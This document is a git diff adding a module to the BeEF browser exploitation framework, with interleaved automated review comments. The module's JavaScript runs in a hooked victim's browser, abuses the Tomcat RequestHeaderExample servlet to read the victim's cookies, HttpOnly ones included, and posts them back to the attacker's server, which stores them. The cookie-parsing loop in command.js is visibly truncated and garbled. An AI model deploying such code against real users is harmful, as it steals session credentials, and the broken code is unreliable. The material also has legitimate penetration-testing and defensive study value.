diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
new file mode 100644
index 000000000..7f4ca4882
--- /dev/null
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
@@ -0,0 +1,53 @@
+//
+// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+ request_header_servlet_path = "<%= @request_header_servlet_path %>";
+
+ function parseResponse() {
+ var cookie_dict = {};
+
+ if (xhr.readyState == 4) {
+ if (xhr.status == 404) {
+ beef.debug("[apache_tomcat_examples_cookie_disclosure] RequestHeaderExample not found");
+ return;
+ }
+
+ if (xhr.status != 200) {
+ beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected HTTP response status " + xhr.status)
+ return;
+ }
+
+ if (!xhr.responseText) {
+ beef.debug("[apache_tomcat_examples_cookie_disclosure] No response content")
+ return;
+ }
+
+ beef.debug("[apache_tomcat_examples_cookie_disclosure] Received HTML content (" + xhr.responseText.length + " bytes)");
+
+ var content = xhr.responseText.replace(/\r|\n/g,'').match(/(.+)<\/table>/)[0];
+
+ if (!content || !content.length) {
+ beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected response: No HTML table in response")
+ return;
+ }
+
+ var cookies = content.match(/cookie<\/td>(.+)<\/td>?/)[1].split('; ');
+ for (var i=0; i", <%= @command_id %>, "cookies=" + result);
+ }
+ }
+
+ var xhr = new XMLHttpRequest();
+ xhr.onreadystatechange = parseResponse;
+ xhr.open("GET", request_header_servlet_path, true);
+ xhr.send();
+});
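Review bot: In `parseResponse`, the `[0]` index on `.match(/(.+)<\/table>/)` runs before the `!content` guard, so a response without a table makes `match` return null and throws a TypeError instead of reaching the "No HTML table in response" debug message. The same applies to `content.match(/cookie<\/td>(.+)<\/td>?/)[1]` when the page has no cookie row. Keep the match result in a variable and test it before indexing, e.g. `var m = body.match(...); if (!m) { beef.debug(...); return; }`. Separately, `request_header_servlet_path` is assigned without `var` and so leaks as an implicit global on the hooked page; `var request_header_servlet_path = ...` keeps it local. The loop body after `for (var i=0; i` is not legible in this rendering of the patch (the regex literals may be truncated as well), so that part is not reviewed here.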
diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
new file mode 100644
index 000000000..ca5005911
--- /dev/null
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ apache_tomcat_examples_cookie_disclosure:
+ enable: true
+ category: ["Browser", "Hooked Domain"]
+ name: "Apache Tomcat RequestHeaderExample Cookie Disclosure"
+ description: "This module uses the Apache Tomcat examples web app (if installed) in order to read the victim's cookies, even if issued with the HttpOnly attribute."
+ authors: ["bcoles"]
+ target:
+ working: ["All"]
diff --git a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
new file mode 100644
index 000000000..05c96fbf7
--- /dev/null
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
+
+ def self.options
+ [
+ {'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'},
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['cookies'] = @datastore['cookies']
+ save content
+ end
+end
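Review bot: The `description` in config.yaml says the examples web app must be installed but not why HttpOnly gives no protection, nor what fixes the finding. command.js shows the mechanism: it parses a cookie row out of the HTML table returned by the RequestHeaderExample servlet, i.e. the servlet echoes the request's Cookie header into a same-origin response body. A sentence such as `Requires the Tomcat examples app to be reachable on the hooked origin; remediation is to remove or restrict /examples on production hosts.` would let someone reading the module result act on it.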
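Review bot: `post_execute` in module.rb stores `@datastore['cookies']` verbatim through `save content`, and neither the class nor the method has a comment saying what that value holds. By the module's own description it can include HttpOnly session cookies, so the results store ends up holding live credentials; a comment such as `# Stores raw cookie values (may include HttpOnly session cookies); treat saved results as sensitive.` above `post_execute` would make that explicit. The default `request_header_servlet_path` is also rendered into a double-quoted JavaScript string in command.js, apparently without escaping, so an option value containing `"` would break the generated script. Escaping or validating the option before templating avoids that.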